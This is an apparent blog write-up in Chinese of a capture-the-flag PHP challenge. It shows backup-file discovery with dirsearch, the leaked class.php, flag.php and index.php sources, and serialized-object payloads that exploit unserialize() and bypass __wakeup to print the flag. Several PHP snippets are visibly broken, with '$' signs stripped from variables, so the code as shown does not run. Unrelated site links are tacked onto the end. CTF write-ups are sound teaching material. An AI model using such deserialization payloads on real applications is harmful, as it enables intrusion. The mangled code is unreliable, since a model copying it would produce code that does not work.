19,[极客大挑战 2019]PHP1

这个好玩

看到备份网站字眼,用dirsearch扫描

在kali里打开

爆破出一个www.zip文件

访问一下

解压后是这个页面

class.php

<?php

include 'flag.php';

error_reporting(0);

class Name{

private $username = 'nonono';

private $password = 'yesyes';

public function __construct(username,password){

this-\>username = username;

this-\>password = password;

}

function __wakeup(){

$this->username = 'guest';

}

function __destruct(){

if ($this->password != 100) {

echo "</br>NO!!!hacker!!!</br>";

echo "You name is: ";

echo $this->username;echo "</br>";

echo "You password is: ";

echo $this->password;echo "</br>";

die();

}

if ($this->username === 'admin') {

global $flag;

echo $flag;

}else{

echo "</br>hello my friend~~</br>sorry i can't give you the flag!";

die();

}

}

}

?>

username=admin

password=100

flag.php

<?php

$flag = 'Syc{dog_dog_dog_dog}';

?>

index.php

<!DOCTYPE html>

<head>

<meta charset="UTF-8">

<title>I have a cat!</title>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">

<link rel="stylesheet" href="style.css">

</head>

<style>

#login{

position: absolute;

top: 50%;

left:50%;

margin: -150px 0 0 -150px;

width: 300px;

height: 300px;

}

h4{

font-size: 2em;

margin: 0.67em 0;

}

</style>

<body>

<div id="world">

<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯

</div>

<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!

</div>

<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">

<?php
include 'class.php';
select = _GET['select'];
res=unserialize(@select);
?>

</div>

<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>

</div>

<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>

<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>

<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>

<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>

<script src="index.js"></script>

</body>

</html>

index.php中有个注释

**include 'class.php';**提到了class.php

**select = _GET['select'];**定义了一个存放GET请求方法的变量select

**res=unserialize(@select);**将一个字符串反序列化为一个PHP变量

<?php

class Name{

private $username = 'admin';

private $password = '100';

}

$select = new Name();

res = serialize(@select);

echo $res

?>

运行得到反序列化代码

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

相关推荐
kunge1v51 小时前
学习爬虫第三天:数据提取
前端·爬虫·python·学习
冬夜戏雪1 小时前
[学习日记][springboot 1-7][leetcode 6道]
java·开发语言·学习
趣味编程1111 小时前
go的学习2---》并发编程
学习·golang·perl
code_ing-1 小时前
【Linux】Linux基本指令
linux·笔记
zzzsde2 小时前
【Linux】linux基础指令入门(1)
linux·运维·学习
_hermit:2 小时前
【从零开始java学习|第二十二篇】集合进阶之collection
java·学习
_dindong2 小时前
基础算法:滑动窗口
数据结构·学习·算法·leetcode·力扣
xiejava10183 小时前
开源安全管理平台wazuh-暴力破解检测与响应
安全·开源·wuzuh
ouliten3 小时前
cuda编程笔记(27)-- NVTX的使用
笔记·cuda
今天只学一颗糖3 小时前
Linux学习笔记--查询_唤醒方式读取输入数据
笔记·学习